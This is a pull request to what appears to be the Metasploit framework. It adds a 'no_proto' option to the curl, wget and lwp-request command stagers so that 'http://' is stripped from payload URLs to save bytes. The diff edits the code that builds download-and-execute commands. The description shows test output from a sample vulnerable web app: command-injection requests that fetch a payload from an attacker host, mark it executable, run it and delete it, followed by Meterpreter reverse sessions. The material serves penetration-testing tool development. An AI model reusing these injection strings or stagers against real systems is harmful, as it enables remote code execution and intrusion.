### PR TITLE
Add 'no_proto' option to wget/curl/lwp-request command stagers

### DIFF
--- a/lib/rex/exploitation/cmdstager/curl.rb
+++ b/lib/rex/exploitation/cmdstager/curl.rb
@@ -24,11 +24,13 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
 
   def generate_cmds_payload(opts)
     cmds = []
+    uri = opts[:payload_uri]
 
     if opts[:ssl]
-      cmds << "curl -kso #{@payload_path} #{opts[:payload_uri]}"
+      cmds << "curl -kso #{@payload_path} #{uri}"
     else
-      cmds << "curl -so #{@payload_path} #{opts[:payload_uri]}"
+      uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
+      cmds << "curl -so #{@payload_path} #{uri}"
     end
 
     cmds

--- a/lib/rex/exploitation/cmdstager/lwprequest.rb
+++ b/lib/rex/exploitation/cmdstager/lwprequest.rb
@@ -23,7 +23,11 @@ class Rex::Exploitation::CmdStagerLwpRequest < Rex::Exploitation::CmdStagerBase
   end
 
   def generate_cmds_payload(opts)
-    ["lwp-request -m GET #{opts[:payload_uri]} > #{@payload_path}"]
+    uri = opts[:payload_uri]
+    unless opts[:ssl]
+      uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
+    end
+    ["lwp-request -m GET #{uri} > #{@payload_path}"]
   end
 
   def generate_cmds_decoder(opts)

--- a/lib/rex/exploitation/cmdstager/wget.rb
+++ b/lib/rex/exploitation/cmdstager/wget.rb
@@ -24,12 +24,15 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
 
   def generate_cmds_payload(opts)
     cmds = []
+
+    uri = opts[:payload_uri]
     ncc  = '--no-check-certificate'
 
     if opts[:ssl]
-      cmds << "wget -qO #{@payload_path} #{ncc} #{opts[:payload_uri]}"
+      cmds << "wget -qO #{@payload_path} #{ncc} #{uri}"
     else
-      cmds << "wget -qO #{@payload_path} #{opts[:payload_uri]}"
+      uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
+      cmds << "wget -qO #{@payload_path} #{uri}"
     end
 
     cmds


### PR DESCRIPTION
This PR adds a `no_proto` option to `curl`, `wget` and `lwp-request` command stagers.

`curl`, `wget` and `lwp-request` utilities default to `http://` URL scheme when no scheme is provided. Although this is common, it is not universal. Older versions may not support this behavior.

Dropping the scheme from the URL saves seven bytes, which can be necessary in restrictive command execution scenarios. This doesn't come up very often, but when it does, saving seven bytes is massive.

# Output

A few tests against the sample [Vulnerability Test Case](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers#the-vulnerability-test-case) for command stagers.

```
msf6 exploit(unix/webapp/test) > set cmdstager::flavor curl
cmdstager::flavor => curl
msf6 exploit(unix/webapp/test) > rexploit 
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] Sending payload (150 bytes) ...
[*] Using URL: http://0.0.0.0:8080/7aehfvSD
[*] Local IP: http://172.16.191.192:8080/7aehfvSD
####################
# Request:
####################
GET /stage.php?ip=%3b%20curl%20-so%20/tmp/uvzZyLwq%20172.16.191.192%3a8080/7aehfvSD%3bchmod%20%2bx%20/tmp/uvzZyLwq%3b/tmp/uvzZyLwq%3brm%20-f%20/tmp/uvzZyLwq HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36


[*] Client 172.16.191.192 (curl/7.81.0) requested /7aehfvSD
[*] Sending payload to 172.16.191.192 (curl/7.81.0)
[*] Sending stage (989032 bytes) to 172.16.191.192
[*] Meterpreter session 8 opened (172.16.191.192:4444 -> 172.16.191.192:56580 ) at 2022-01-29 08:20:04 -0500
^C
[-] Exploit failed [user-interrupt]: Interrupt 
[*] Server stopped.
[-] rexploit: Interrupted
msf6 exploit(unix/webapp/test) > set cmdstager::flavor wget
cmdstager::flavor => wget
msf6 exploit(unix/webapp/test) > rexploit 
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] Sending payload (150 bytes) ...
[*] Using URL: http://0.0.0.0:8080/muBWOY8Zzn5cFK
[*] Local IP: http://172.16.191.192:8080/muBWOY8Zzn5cFK
####################
# Request:
####################
GET /stage.php?ip=%3b%20wget%20-qO%20/tmp/tRotYSFD%20172.16.191.192%3a8080/muBWOY8Zzn5cFK%3bchmod%20%2bx%20/tmp/tRotYSFD%3b/tmp/tRotYSFD%3brm%20-f%20/tmp/tRotYSFD HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36


[*] Client 172.16.191.192 (Wget/1.21.2) requested /muBWOY8Zzn5cFK
[*] Sending payload to 172.16.191.192 (Wget/1.21.2)
[*] Sending stage (989032 bytes) to 172.16.191.192
[*] Meterpreter session 9 opened (172.16.191.192:4444 -> 172.16.191.192:56582 ) at 2022-01-29 08:20:09 -0500
^C
[-] Exploit failed [user-interrupt]: Interrupt 
[*] Server stopped.
[-] rexploit: Interrupted
msf6 exploit(unix/webapp/test) > set cmdstager::flavor lwprequest 
cmdstager::flavor => lwprequest
msf6 exploit(unix/webapp/test) > rexploit 
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] Sending payload (150 bytes) ...
[*] Using URL: http://0.0.0.0:8080/kIQV556mrO
[*] Local IP: http://172.16.191.192:8080/kIQV556mrO
####################
# Request:
####################
GET /stage.php?ip=%3b%20lwp-request%20-m%20GET%20172.16.191.192%3a8080/kIQV556mrO%20%3e%20/tmp/syOJnfcj%3bchmod%20%2bx%20/tmp/syOJnfcj%3b/tmp/syOJnfcj%3brm%20-f%20/tmp/syOJnfcj HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36


[*] Client 172.16.191.192 (lwp-request/6.60 libwww-perl/6.60) requested /kIQV556mrO
[*] Sending payload to 172.16.191.192 (lwp-request/6.60 libwww-perl/6.60)
[*] Sending stage (989032 bytes) to 172.16.191.192
[*] Meterpreter session 10 opened (172.16.191.192:4444 -> 172.16.191.192:56584 ) at 2022-01-29 08:20:16 -0500
^C
[-] Exploit failed [user-interrupt]: Interrupt 
[*] Server stopped.
[-] rexploit: Interrupted
msf6 exploit(unix/webapp/test) > sessions -K
[*] Killing all sessions...
[*] 127.0.0.1 - Meterpreter session 8 closed.
[*] 127.0.0.1 - Meterpreter session 9 closed.
[*] 127.0.0.1 - Meterpreter session 10 closed.
msf6 exploit(unix/webapp/test) > 
```
